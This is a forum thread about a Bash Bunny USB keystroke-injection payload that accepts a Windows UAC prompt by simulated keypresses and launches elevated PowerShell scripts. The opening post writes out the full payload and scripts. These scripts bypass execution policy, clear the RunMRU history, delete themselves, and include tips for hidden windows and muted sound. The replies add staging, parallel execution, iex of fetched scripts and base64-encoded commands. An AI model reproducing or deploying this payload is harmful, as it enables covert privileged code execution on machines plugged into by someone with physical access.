Dracstic Posted September 23, 2019 Share Posted September 23, 2019 Hello all, I'm working on a project that requires multiple programs to run in parallel and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps. It starts with modifying the run.sh file in the extensions folder. I added the following code after the line "case "$os" in". This isn't strictly needed but I plan on using this in the future as well. WIN_UAC) QUACK GUI r QUACK DELAY 500 QUACK STRING "$@" QUACK CTRL-SHIFT ENTER QUACK DELAY 1000 QUACK ALT y QUACK ALT c QUACK LEFTARROW QUACK ENTER QUACK ENTER ;; I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick powershell script using the new RUN WIN_UAC command that I just added. ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1 ######## ATTACK ######## LED ATTACK Q DELAY 1000 RUN WIN_UAC "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')" ######## FINISH ######## LED FINISH The RUN WIN_UAC command will run the powershell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged. #Setup Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window Set-ExecutionPolicy bypass -force #disable UAC for this script Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp; Start-Process powershell (($env:temp)+'\p2.ps1') #Copy p2.ps1 from BashBunny storage root to temp folder on PC then run p2.ps1. P2.ps1 will run with admin privileges from the temporary folder and when it's job is complete will delete itself and end the powershell process. #Setup Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window Set-ExecutionPolicy bypass -force #disable UAC for this script #Your payload here with all the privileges. Remove-Item (($env:temp)+'\p1.ps1') #Delete this script file Stop-Process -Id $PID #End this process #End ################################################################################################ To add stealthyness I would add -windowstyle hidden to the Start-Process lines as well as turn down the volume or mute before the UAC window is triggered. What do you think? Drac. Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted September 23, 2019 Share Posted September 23, 2019 You can create a stager to handle the download and execution of all your scripts under the same admin context without having to repeatedly launch a new process via quack commands. Staging is using one script or program to download and launch additional scripts. You would use ps1 in get a bypassed instance with your WIN_UAC function. Inside the ps1 you would have additional commands to start new processes for each script. Because ps1 was started elevated, anything it runs will run elevated too. So inside ps1 you could Start-Process Powershell -argumentlist "<path to powershell script> <arguments for script>" Also, I do not see the need to move the scripts around from their switch folder. If ps1 launched from the BB payload switch folder then ps2 can too. Link to comment Share on other sites More sharing options...
Dracstic Posted September 24, 2019 Author Share Posted September 24, 2019 I'll keep that in mind. Running one script from the bashbunny would work great for quick jobs. Unfortunately the project I'm working on downloads and runs multiple executables and takes over an hour to complete. I know powershell scripts are copied to and ran from memory but I was having issues with reliability after the script was started and the bashbunny was unplugged. With the two script setup I can unplug the bashbunny as soon as the first script closes. Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted September 24, 2019 Share Posted September 24, 2019 Why would you have to wait? You can fire off each script in parallel too in the powershell script. "Start-Process" is non-blocking. in PS1 you would have 2 start-process for powershell and the argument for the first script in the first one and second script in second one. Or a third one for a third script also. Start process will fire off one after another but will not wait for them to finish to fire off the others. It will only wait if you use wait-process. At the end of the ps1 file you can signal however you like to the bunny you are done so you can pull the bash bunny. Running them in memory means firing off a "start-process powershell" but for the argument will be a command to get content and iex one of those scripts. Now your iex is in another powershell process and not holding up ps1. Remember start process if you want something ran outside of your current process. Remember you can pass the job of grabbing and running that script to that process. If you really feel like coding you can grab the script and Unicode base64 encode them and then run "start-process powershell" and use the "-E" for the argument with the base64 encoded script...if it is not bigger than 8.9k characters. I am rounding. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.